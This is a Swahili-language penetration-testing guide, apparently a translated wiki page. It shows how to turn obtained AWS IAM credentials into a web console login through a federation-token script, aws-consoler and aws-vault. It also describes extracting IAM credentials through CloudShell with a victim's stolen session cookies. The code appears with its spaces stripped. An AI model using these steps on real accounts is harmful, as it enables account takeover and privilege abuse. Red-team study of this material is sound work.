Ikiwa umefanikiwa kupata baadhi ya IAM credentials unaweza kuwa na nia ya kupata konsoli ya wavuti kwa kutumia zana zifuatazo.
Tafadhali kumbuka kuwa mtumiaji/role lazima awe na ruhusa ya sts:GetFederationToken.
Script ya Kibinafsi
Script ifuatayo itatumia wasifu wa msingi na eneo la msingi la AWS (si gov na si cn) kukupa URL iliyosainiwa unayoweza kutumia kuingia kwenye konsoli ya wavuti:
# Get federated creds (you must indicate a policy or they won't have any perms)## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges## Don't forget to use [--profile <prof_name>] in the first line if you need tooutput=$(awsstsget-federation-token--nameconsoler--policy-arnsarn=arn:aws:iam::aws:policy/AdministratorAccess)if [ $? -ne0 ]; thenecho"The command 'aws sts get-federation-token --name consoler' failed with exit status $status"exit $statusfi# Parse the outputsession_id=$(echo $output |jq-r '.Credentials.AccessKeyId')session_key=$(echo $output |jq-r '.Credentials.SecretAccessKey')session_token=$(echo $output |jq-r '.Credentials.SessionToken')# Construct the JSON credentials stringjson_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
# Define the AWS federation endpointfederation_endpoint="https://signin.aws.amazon.com/federation"# Make the HTTP request to get the sign-in tokenresp=$(curl-s "$federation_endpoint" \--get \--data-urlencode "Action=getSigninToken" \--data-urlencode "SessionDuration=43200" \--data-urlencode "Session=$json_creds")signin_token=$(echo-n $resp |jq-r '.SigninToken' |tr-d '\n' |jq-sRr@uri)# Give the URL to loginecho -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
cd/tmppython3-mvenvenvsource./env/bin/activatepipinstallaws-consoleraws_consoler [params...] #This will generate a link to login into the console
Hakikisha mtumiaji wa IAM ana ruhusa ya sts:GetFederationToken, au toa jukumu la kudai.
aws-vault
aws-vault ni chombo cha kuhifadhi na kupata kwa usalama sifa za AWS katika mazingira ya maendeleo.
aws-vaultlistaws-vaultexecjonsmith--awss3ls# Execute aws cli with jonsmith credsaws-vaultloginjonsmith# Open a browser logged as jonsmith
Unaweza pia kutumia aws-vault kupata kikao cha kivinjari
Kutoka Konsoli hadi IAM Creds
Kugunduliwa awali katika chapisho hili, Ikiwa unafanikiwa kudukua ufikiaji fulani kwenye konsoli ya wavuti (labda uliiba vidakuzi na hukufanikiwa kupata folda ya .aws), unaweza kupata baadhi ya siri za kitambulisho cha IAM kwa mtumiaji huyo kupitia CloudShell.
CloudShell inafunua siri za kitambulisho cha IAM kupitia kituo kisichodokezwa kwenye bandari 1338. Baada ya kupakia vidakuzi vya kikao kutoka kwa muathiriwa kwenye kivinjari chako, unaweza kwenda kwenye CloudShell na kutumia amri zifuatazo kupata siri za kitambulisho cha IAM.